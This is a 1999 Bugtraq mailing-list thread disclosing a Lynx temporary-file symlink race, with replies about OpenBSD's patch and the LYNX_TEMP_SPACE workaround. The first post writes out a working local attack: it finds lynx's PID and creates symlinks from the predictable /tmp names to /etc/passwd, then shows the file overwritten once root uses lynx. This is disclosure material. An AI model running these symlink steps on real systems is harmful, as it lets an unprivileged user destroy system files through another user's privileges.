Date: Tue, 9 Feb 1999 20:57:30 -0500
From: Juan Diego Bolanos
To: BUGTRAQ@netspace.org
Subject: Lynx /tmp problem

Hi Aleph,
please filter this if already posted....

------

Hello....

I have found a bug in Lynx all versions, except the latest stable release...

lynx creates temporary files in /tmp in this way....

L[num proc]-xTMP.html

where [num proc] is the proc number in the machine
x is a number from 0 to 9

If I run lynx as any user, for example root, we see this

earthworm:~$ ps
  PID TTY STAT  TIME COMMAND
   91   1 SW    0:06 (bash)
   94   4 S     0:05 -bash
   95   5 SW    0:06 (bash)
 3867  a3 S     0:00 pppd -detach defaultroute crtscts modem 192.168.2.6:
 3870   3 SW    0:02 (ssh)
 3894   4 T     0:00 lynx
 3898   4 R     0:00 ps

then the files in /tmp created by lynx will be..

L3894-0TMP.html
L3894-1TMP.html
L3894-2TMP.html
L3894-3TMP.html
L3894-4TMP.html
L3894-5TMP.html
L3894-6TMP.html
L3894-7TMP.html
L3894-8TMP.html
L3894-9TMP.html

If I make a symlink from all of these files to any file in the system, for example....

earthworm:~$ cd /tmp
earthworm:/tmp$ ln -s /etc/passwd L3894-0TMP.html
earthworm:/tmp$ ln -s /etc/passwd L3894-1TMP.html
earthworm:/tmp$ ln -s /etc/passwd L3894-2TMP.html
earthworm:/tmp$ ln -s /etc/passwd L3894-3TMP.html
earthworm:/tmp$ ln -s /etc/passwd L3894-4TMP.html
earthworm:/tmp$ ln -s /etc/passwd L3894-5TMP.html
earthworm:/tmp$ ln -s /etc/passwd L3894-6TMP.html
earthworm:/tmp$ ln -s /etc/passwd L3894-7TMP.html
earthworm:/tmp$ ln -s /etc/passwd L3894-8TMP.html
earthworm:/tmp$ ln -s /etc/passwd L3894-9TMP.html

and now root (in this example) tries to download a file, or presses the backspace key to reach the history list, the file I have linked (in this case /etc/passwd) will be replaced with it... and now is owned by root...

For example I got this in my system...

earthworm:/tmp$ cat /etc/passwd
Lynx History Page

You have reached the History Page

Lynx Version 2.8rel2

You selected:
  0. Internet Firewalls Frequently Asked Questions
file://localhost/root/firefaq.html

As you can see, the file is lost now...

This bug is lynx specific, so all OSes are vulnerable..

Fix: upgrade to the latest lynx version. I have checked it, and it appears to use L[proc num]-xTMP.html where x is from 0 to ???... I hope it is already fixed; creating 100 symlinks is not too hard :)

The lynx team knows this already.

by... Juan Diego

---------------------------------------------------------------------------

Date: Thu, 11 Feb 1999 12:55:41 -0700
From: Theo de Raadt
To: BUGTRAQ@netspace.org
Subject: Re: Lynx /tmp problem

> this bug is lynx specific, so all OS are vulnerable..

OpenBSD ships with an integrated version of lynx. Our version has tweaks to avoid this issue.

We've brought this issue up with the lynx people before. They do not appear to give a damn.

That said, from reading the code I can see why they might not care -- this problem is going to be a complete nightmare to fix. Lynx's handling of /tmp is wrought with many races, and the code is pasta.

---------------------------------------------------------------------------

Date: Fri, 12 Feb 1999 08:47:00 +0000
From: Glynn Clements
To: BUGTRAQ@netspace.org
Subject: Re: Lynx /tmp problem

Juan Diego Bolanos wrote:

> Hi Aleph,
> please filter this if already posted....

The fact that lynx has potential /tmp problems was discussed last March:

    From: Michal Zalewski
    Subject: Another day, another race - lynx 2.7.1
    Date: Tue, 17 Mar 1998 15:39:58 +0100
    Message-ID:

> I have found a bug in Lynx all versions, except the latest stable
> release...
>
> lynx creates temporary files in /tmp in this way....

[details of your average /tmp problem snipped].

From the INSTALLATION file:

    The environment variable "LYNX_TEMP_SPACE", if set, will override
    the default path prefix for temporary files that was defined via
    the constant "TEMP_SPACE" in userdefs.h. See userdefs.h for more
    information.

--
Glynn Clements